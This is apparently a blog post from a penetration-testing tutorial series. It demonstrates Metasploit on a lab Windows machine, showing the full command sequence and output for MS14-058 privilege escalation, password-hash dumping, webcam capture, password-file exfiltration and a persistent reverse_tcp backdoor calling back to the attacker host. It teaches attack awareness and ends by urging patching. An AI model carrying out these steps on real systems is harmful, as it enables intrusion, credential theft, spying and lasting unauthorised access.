Seeing Red: The Fun Stuff

Seeing Red: The Fun Stuff

The Fun Stuff: Privilege Escalation, Exfiltration, and Persistence

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we successfully exploited our Victim using a client-side attack targeting an old version of Microsoft Internet Explorer.  We ended with a Meterpreter session confirming our access to the Victim machine.  In this part, we’ll explore the capabilities of Meterpreter including privilege escalation and data exfiltration.

Privilege Escalation

We talked a bit about Meterpreter in the last post, now let’s play with some of its many functions.  Our Meterpreter session is now running under the Notepad process as the lower-privileged “eric” user.  We want to escalate our privileges to give us enhanced system functionality.  In Windows, the highest user is “SYSTEM”.

Meterpreter has a built-in “getsystem” command that will attempt to use various techniques to elevate our user to SYSTEM.  Let’s give it a try.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Hmm, no luck.  No worries, let’s try a local exploit.  MS14-058 seems like a good one.

meterpreter > background
Backgrounding session 1...
msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms14_058_track_popup_menu) > set LPORT 5555
LPORT => 5555
msf exploit(ms14_058_track_popup_menu) > exploit
[*] Started reverse handler on 10.0.1.10:5555
[*] Launching notepad to host the exploit...
[+] Process 1556 launched.
[*] Reflectively injecting the exploit DLL into 1556...
[*] Injecting exploit into 1556...
[*] Exploit injected. Injecting payload into 1556...
[*] Payload injected. Executing exploit...
[*] Sending stage (770048 bytes) to 10.0.1.11
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.0.1.10:5555 -> 10.0.1.11:49209) at 2015-07-26 17:04:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Success!  We’re now running as SYSTEM.

A Little Bit of Fun

So now what?  The first thing an attacker will likely do is dump password hashes.  This is easy to do with Meterpreter.  These hashes can the be cracked offline giving us, the Attacker, passwords to try on Victim online accounts.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
eric:1000:aad3b435b51404eeaad3b435b51404ee:7a08e99f765c50c0f1768692200e6db5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

How about a screenshot of the desktop?

meterpreter > screenshot
Screenshot saved to: /root/mUSXxVRT.jpeg

exploit_screenshot

Got a webcam? Let’s take a picture and stream some video!

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/SCCMCDyI.jpeg

meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: zwuaLciW.html
[*] Streaming...

What files are on the system?  Perhaps a password file…

meterpreter > ls

Listing: c:\Users\eric\Desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2015-07-26 17:13:01 -0500 .
40777/rwxrwxrwx 0 dir 2014-11-11 19:36:51 -0600 ..
100666/rw-rw-rw- 282 fil 2014-11-11 20:06:50 -0600 desktop.ini
100666/rw-rw-rw- 113 fil 2015-07-26 17:12:27 -0500 my_passwords.txt

meterpreter > cat my_passwords.txt
Top Secret Passwords
+ Bank: no-one-will-guess-this-password
+ Email: password!@#$
+ Amazon: shoptilyoudrop192

meterpreter > download my_passwords.txt
[*] downloading: my_passwords.txt -> my_passwords.txt
[*] downloaded : my_passwords.txt -> my_passwords.txt

This is but a small sampling of the many commands Meterpreter provides.  Play with the other commands to see what else Meterpreter can do.

Persistence

Now that we’ve compromised our Victim machine, let’s install a persistent backdoor that allows us back in even if the machine is restarted.  To do this, we’ll generate a backdoor that autostarts and periodically calls back to our Attacker machine.

meterpreter > run persistence -S -i 5 -p 1337 -r 10.0.1.10
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-FDN9DNVQ5IR_20150726.4130/WIN-FDN9DNVQ5IR_20150726.4130.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.0.1.10 LPORT=1337
[*] Persistent agent script is 148420 bytes long
[+] Persistent Script written to C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[*] Executing script C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[+] Agent executed with PID 2008
[*] Installing as service..
[*] Creating service dexYVTDwgSWcORt

Back on our Attacker machine, we’ll setup a Meterpreter handler to accept any incoming connections from our Victim machine.

msf exploit(ms14_058_track_popup_menu) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(handler) > set LPORT 1337
LPORT => 1337

Run the handler on the Attacker and restart the Victim machine. If all goes well we should be reconnected as SYSTEM.

msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.1.10:1337
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 7 opened (10.0.1.10:1337 -> 10.0.1.11:49161) at 2015-07-26 17:47:55 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Too easy!

Conclusion

Throughout this series we’ve walked through a typical client-side attack.  We started with a basic understanding of penetration testing tools and what is commonly used.  We performed reconnaissance on our Victim machine and determined what vulnerable software could be exploited.  We then set up a client-side attack and compromised our Victim machine, gaining low-privilege access.  Finally, we executed a local privilege escalation exploit to gain SYSTEM privileges, used Meterpreter to demonstrate our control over the system including data exfiltration, and finally created a persistent backdoor so we can re-establish access at any time.

Hopefully, this has been an eye-opening experience to see just how easy it is to compromise a system and why it is so important to stay up to date with software patches and apply basic security principles.  In the next series, we’ll investigate how to detect malicious activity and defend a network using open source security tools.


Stuff I Like

Web Hosting: SiteGround

ericooi.com is proudly hosted by SiteGround. Performance and customer service are top notch. Quick and easy https implementation via built-in Let's Encrypt integration.

VPN: Private Internet Access

When I'm using a public internet access point, I use Private Internet Access to secure my connections. Easy to use, fast speeds, and no logs.

Cell Phone: Ting

I don't use many minutes or much data since I'm usually on Wi-Fi, making Ting a smart choice. It features nationwide coverage, fast LTE, and pay as you go rates.


Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.